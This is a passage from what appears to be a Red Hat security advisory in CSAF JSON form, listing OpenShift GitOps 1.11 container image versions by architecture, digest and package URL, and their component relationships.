"product_id": "openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"product": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"product_id": "openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/console-plugin-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"product": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"product_id": "openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"product": {
"name": "openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"product_id": "openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/dex-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"product": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"product_id": "openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/kam-delivery-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"product": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"product_id": "openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/must-gather-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"product": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"product_id": "openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator\u0026tag=v1.11.7-2"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"product": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"product_id": "openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"product": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"product_id": "openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"product": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"product_id": "openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/console-plugin-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"product": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"product_id": "openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"product": {
"name": "openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"product_id": "openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/dex-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"product": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"product_id": "openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/kam-delivery-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le",
"product": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le",
"product_id": "openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/must-gather-rhel8\u0026tag=v1.11.7-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"product": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"product_id": "openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator\u0026tag=v1.11.7-2"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le"
},
"product_reference": "openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x"
},
"product_reference": "openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64"
},
"product_reference": "openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64"
},
"product_reference": "openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le"
},
"product_reference": "openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64"
},
"product_reference": "openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x"
},
"product_reference": "openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64"
},
"product_reference": "openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64"
},
"product_reference": "openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le"
},
"product_reference": "openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64"
},
"product_reference": "openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x"
},
"product_reference": "openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64"
},
"product_reference": "openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le"
},
"product_reference": "openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64"
},
"product_reference": "openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x"
},
"product_reference": "openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64"
},
"product_reference": "openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x"
},
"product_reference": "openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64"
},
"product_reference": "openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64"
},
"product_reference": "openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le"
},
"product_reference": "openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x"
},
"product_reference": "openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64"
},
"product_reference": "openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le"
},
"product_reference": "openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64"
},
"product_reference": "openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le"
},
"product_reference": "openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64"
},
"product_reference": "openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64 as a component of Red Hat OpenShift GitOps 1.11",
"product_id": "8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64"
},
"product_reference": "openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"relates_to_product_reference": "8Base-GitOps-1.11"
},
{
"category": "default_component_of",
"full_product_name": {
